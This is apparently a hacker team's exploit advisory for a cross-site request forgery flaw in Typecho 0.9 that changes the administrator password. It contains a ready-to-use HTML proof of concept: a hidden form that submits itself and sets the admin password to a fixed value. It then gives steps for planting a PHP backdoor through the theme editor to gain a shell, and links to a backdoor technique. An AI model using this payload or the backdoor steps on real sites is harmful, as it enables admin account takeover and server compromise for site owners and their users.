We enjoy hacking of life in day and night.
_______________________________________________
[+] Author: Evi1m0 <evi1m0.bat@gmail.com>
[+] Team: FF0000 TEAM <http://www.ff0000.cc>
[+] From: HackerSoul <http://www.hackersoul.com>
_______________________________________________
-= Main =-
[*] 1. Description
http://typecho/admin/profile.php page, Change password form CSRF vul.
http://typecho/admin/themes.php, We can write the PHP Backdoor in this page.
[*] 2. CSRF POC
<div style="display: none;"> <form action="http://typecho/index.php/action/users-profile" method="post" name="ff0000team" enctype="application/x-www-form-urlencoded"> <input type="hidden" name="password" value="bug1024"/> <input type="hidden" name="confirm" value="bug1024" /> <input name="do" type="hidden" value="password" /> <button type="submit"></button> </form> </div> <script> setTimeout("document.ff0000team.submit()", 2000); </script>
[*] 3. GETSHELL
http://typecho/admin/theme-editor.php page, Write backdoor.
Or, Write this: http://www.hackersoul.com/post/PHP中使用按位取反函数创建后门. html
-= END =-
查看更多关于Typecho 0.9(13.12.12) CSRF修改管理员密码漏洞 - 网站安的详细内容...